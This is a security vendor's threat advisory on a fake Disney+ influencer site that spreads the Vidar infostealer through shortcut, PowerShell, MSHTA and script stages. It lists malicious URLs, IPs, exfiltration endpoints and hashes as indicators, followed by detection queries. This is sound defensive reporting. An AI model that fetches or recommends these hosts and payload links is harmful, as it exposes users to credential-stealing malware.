Date: 07/25/2025
Severity: Critical
Summary
Our team uncovered a malicious website impersonating Disney+, used to deliver the Vidar infostealer malware. The site posed as an influencer collaboration portal, luring users into executing malware hosted on a WebDAV server. Clicking the “View Full Brief” button triggered a multi-stage infection chain involving Windows shortcuts, PowerShell, MSHTA, VBS, and obfuscated JavaScript. A decoy PDF was displayed while the malware executed silently in the background. This campaign dates back to at least July 5, 2025. While many URLs are now inactive, the domain disneyplus[.]business remains live and may be used in future attacks.
Indicators of Compromise (IOC) List
Domains\URLs : | disneyplus.business https://disneyplus.business/influencersbrief/?id=special https://disneyplus.business/influencersbrief/?id=youtube http://89.23.113.207/Documents/Brief_Disney.lnk http://89.23.113.207/Documents/BriefDisney.lnk http://89.23.113.207/Documents/BriefDisneyFull.lnk http://89.23.113.207/Documents/Disney_Full_Brief.lnk http://89.23.113.207/Documents/DisneyBrief.lnk https://investtrad.com/Blue.mp4 https://www.frontier.net.pk/Brief_Disney.mp4 https://www.localmais.com.br/Disney_Full_Brief.mp4 https://squeakiekids.com/Brief_Disney.pdf https://www.localmais.com.br/disney.pdf https://dansorium.gr/DarkCyanfa1d3_Install.exe https://www.localmais.com.br/PlacedExotic.exe https://t.me/l07tp https://steamcommunity.com/profiles/76561199869630181 https://116.202.184.145/<HTTPSPOSTrequestsfordataexfiltration |
IP Address : | 89.23.107.148 89.23.113.207 |
Hash : | ad4931dedfb3060207f80e3e18df3fbef07a81dbe20dab667f5f14d2ac17136a
4f8a50a9365d639c8384ec857c618a4f768b1ec6b677f5e79bd5d0eaaa579bcb
51cc8732ad424885e37b8d20f99faed9336e78a8a18590d61c64498eb4ec136e
4d6ba4c3e0112fa8ad04153999086eecbe9ba33656a52c627a940650d086e877
94d0a4eced73f3fabc66e650218274b35737bce94f6630b273487b1f3b13841e
0ce235a306f30edff98fcbe045e7566c8e537fef7f5d094800927e2b1d5edc65
46a24124fa27c54512dd02bee6432d4f063d16224926eff268b5625ee258e174
65325bda1aa8c53cde9f59733462154d702d440daead034c5130a78adef31aee
660da1824c143de666903c2b3983df605a3494a9ddaa7b65919e1263b095e343
e7fda5d2d6cc8971565ab7df08b6fe9417c307f692e0a2ef45f758f8092350ad
660da1824c143de666903c2b3983df605a3494a9ddaa7b65919e1263b095e343
|
Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection
Domains\URLs 1 : | domainname like "https://www.localmais.com.br/disney.pdf" or url like "https://www.localmais.com.br/disney.pdf" or siteurl like "https://www.localmais.com.br/disney.pdf" or domainname like "http://89.23.113.207/Documents/Brief_Disney.lnk" or url like "http://89.23.113.207/Documents/Brief_Disney.lnk" or siteurl like "http://89.23.113.207/Documents/Brief_Disney.lnk" or domainname like "https://t.me/gt77cra" or url like "https://t.me/gt77cra" or siteurl like "https://t.me/gt77cra" or domainname like "https://investtrad.com/Blue.mp4" or url like "https://investtrad.com/Blue.mp4" or siteurl like "https://investtrad.com/Blue.mp4" or domainname like "https://steamcommunity.com/profiles/76561199874410755" or url like "https://steamcommunity.com/profiles/76561199874410755" or siteurl like "https://steamcommunity.com/profiles/76561199874410755" or domainname like "https://t.me/l07tp" or url like "https://t.me/l07tp" or siteurl like "https://t.me/l07tp" or domainname like "http://89.23.113.207/Documents/Disney_Full_Brief.lnk" or url like "http://89.23.113.207/Documents/Disney_Full_Brief.lnk" or siteurl like "http://89.23.113.207/Documents/Disney_Full_Brief.lnk" or domainname like "disneyplus.business" or url like "disneyplus.business" or siteurl like "disneyplus.business" or domainname like "https://disneyplus.business/influencersbrief/?id=special" or url like "https://disneyplus.business/influencersbrief/?id=special" or siteurl like "https://disneyplus.business/influencersbrief/?id=special" or domainname like "https://disneyplus.business/influencersbrief/?id=youtube" or url like "https://disneyplus.business/influencersbrief/?id=youtube" or siteurl like "https://disneyplus.business/influencersbrief/?id=youtube" or domainname like "http://89.23.113.207/Documents/BriefDisney.lnk" or url like "http://89.23.113.207/Documents/BriefDisney.lnk" or siteurl like "http://89.23.113.207/Documents/BriefDisney.lnk" or domainname like "http://89.23.113.207/Documents/BriefDisneyFull.lnk" or url like "http://89.23.113.207/Documents/BriefDisneyFull.lnk" or siteurl like "http://89.23.113.207/Documents/BriefDisneyFull.lnk" |
Domains\URLs 2 : | domainname like "http://89.23.113.207/Documents/DisneyBrief.lnk" or url like "http://89.23.113.207/Documents/DisneyBrief.lnk" or siteurl like "http://89.23.113.207/Documents/DisneyBrief.lnk" or domainname like "https://www.frontier.net.pk/Brief_Disney.mp4" or url like "https://www.frontier.net.pk/Brief_Disney.mp4" or siteurl like "https://www.frontier.net.pk/Brief_Disney.mp4" or domainname like "https://www.localmais.com.br/Disney_Full_Brief.mp4" or url like "https://www.localmais.com.br/Disney_Full_Brief.mp4" or siteurl like "https://www.localmais.com.br/Disney_Full_Brief.mp4" or domainname like "https://squeakiekids.com/Brief_Disney.pdf" or url like "https://squeakiekids.com/Brief_Disney.pdf" or siteurl like "https://squeakiekids.com/Brief_Disney.pdf" or domainname like "https://dansorium.gr/DarkCyanfa1d3_Install.exe" or url like "https://dansorium.gr/DarkCyanfa1d3_Install.exe" or siteurl like "https://dansorium.gr/DarkCyanfa1d3_Install.exe" or domainname like "https://www.localmais.com.br/PlacedExotic.exe" or url like "https://www.localmais.com.br/PlacedExotic.exe" or siteurl like "https://www.localmais.com.br/PlacedExotic.exe" or domainname like "https://steamcommunity.com/profiles/76561199869630181" or url like "https://steamcommunity.com/profiles/76561199869630181" or siteurl like "https://steamcommunity.com/profiles/76561199869630181" or domainname like "https://116.202.184.145/<HTTPSPOSTrequestsfordataexfiltration" or url like "https://116.202.184.145/<HTTPSPOSTrequestsfordataexfiltration" or siteurl like "https://116.202.184.145/<HTTPSPOSTrequestsfordataexfiltration" or domainname like "https://116.203.165.124/<HTTPSPOSTrequestsfordataexfiltration" or url like https://116.203.165.124/<HTTPSPOSTrequestsfordataexfiltration" or siteurl like https://116.203.165.124/<HTTPSPOSTrequestsfordataexfiltration" |
IP Address : | dstipaddress IN ("89.23.107.148","89.23.113.207") or srcipaddress IN ("89.23.107.148","89.23.113.207") |
Hash : | sha256hash IN ("4f8a50a9365d639c8384ec857c618a4f768b1ec6b677f5e79bd5d0eaaa579bcb","ad4931dedfb3060207f80e3e18df3fbef07a81dbe20dab667f5f14d2ac17136a","660da1824c143de666903c2b3983df605a3494a9ddaa7b65919e1263b095e343","46a24124fa27c54512dd02bee6432d4f063d16224926eff268b5625ee258e174","0ce235a306f30edff98fcbe045e7566c8e537fef7f5d094800927e2b1d5edc65","51cc8732ad424885e37b8d20f99faed9336e78a8a18590d61c64498eb4ec136e","65325bda1aa8c53cde9f59733462154d702d440daead034c5130a78adef31aee","4d6ba4c3e0112fa8ad04153999086eecbe9ba33656a52c627a940650d086e877","94d0a4eced73f3fabc66e650218274b35737bce94f6630b273487b1f3b13841e","e7fda5d2d6cc8971565ab7df08b6fe9417c307f692e0a2ef45f758f8092350ad","660da1824c143de666903c2b3983df605a3494a9ddaa7b65919e1263b095e343")
|
Reference:
https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-07-24-IOCs-for-Vidar-activity.txt